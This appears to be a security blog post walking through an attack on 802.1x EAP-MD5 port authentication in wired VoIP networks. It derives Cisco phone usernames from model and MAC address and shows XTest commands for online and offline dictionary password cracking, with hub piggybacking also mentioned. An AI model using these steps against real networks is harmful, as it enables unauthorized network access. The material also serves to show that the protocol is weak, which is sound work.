Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II

Now that we have simulated the production network in the previous post of this series, we can proceed for the real attack. I will explain the password breaking procedure using freely available tool. Read more here about setting up port based authentication in wired VoIP Network.
Sipera Viper Lab has released a new tool- XTest for automating the password breaking procedure of 802.1x EAP-MD5 port based authentication.
The tool released under GPL3 license and hosted on sourceforge.net. Tool has some cool features like -

  • 802.1x Supplicant: Test can test the username and password against an 802.1x Authenticator (Ethernet Switch), and supports re-authentication.
  • Offline pcap dictionary attack: If you capture a valid 802.1x authentication sequence into a pcap file, XTest will run an offline dictionary attack against the authentication sequence using a supplied wordlist. XTest will elicit the password from the pcap if the dictionary file contains the valid password.
  • Shared Hub unauthorized access: Using a shared hub, XTest can use the successful authentication of a valid 802.1x supplicant to gain unauthorized access to the network.


Here are the list of steps attacker could take to get un-authorize access in Physical network.
Assumption: Attacker is already in victim premises and has access to phones lying in Lobby or reception.

  • Attacker looks at phone model and MAC address to learn username. Unplug phone from switch port.
  • As we already know Cisco uses hard coded username as an identity for the authentication. So for Cisco 7961G Phone the username can be CP-7961G-SEP<MacAddress>
  • Using XTest, attacker can try to get access by using learned username and random passwords.

bughira@chackraview:~/xtest-1.0# ./xtest -u <UserName> -p <test-Pwd>
Above command will try to complete the authentication sequence for the used username. Instead of testing passwords one by one, you can use Live Dictionary attack feature of XTest.
Just feed good collection of password dictionary to the tool and ask it to break password based on passwords from dictionary.
bughira@chackraview:~/xtest-1.0# ./xtest -u <UserName> -w <DictionaryFile>

4) XTest has Offline Dictionary attack feature: You can supply EAP-MD5-SUCCESS pcap file and tool will break a password for you by retrieving username and challenge from the successful authentication feature.
bughira@chackraview:~/xtest-1.0# ./xtest -c EAP_MD5_SUCCESS.pcap -w <Disctionary File>

5) XTest has built in 802.1x Supplicant and can be used to perform re-authentication attack as show below.


XTest makes sure that no one can completely rely on EAP-MD5 port based authentication schemes. “

Donwnload XTest here.
Happy Hunting..

Rating 3.00 out of 5

2 Responses to “Breaking into 802.1x EAP-MD5 Port based authentication in Wired VoIP Network – II”

  1. VideoJak: Hijaking IP Video Calls!!! « Bughira’s Weblog Says:
    February 26th, 2009 at 7:57 pm

    [...] have posted about XTest tool from VIPER Lab in my previous posts.  This is the third tool published by VIPER Lab after XTest and  UCSniff . VIPER Guys are [...]

  2. d2mypz Says:
    May 17th, 2009 at 2:27 pm

    Hello, Very nice site. Universe help us, dont worry man.

Leave a Reply

This entry was posted on Thursday, September 24th, 2009 at 6:44 pm and is filed under Information Security, Voice Over IP. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes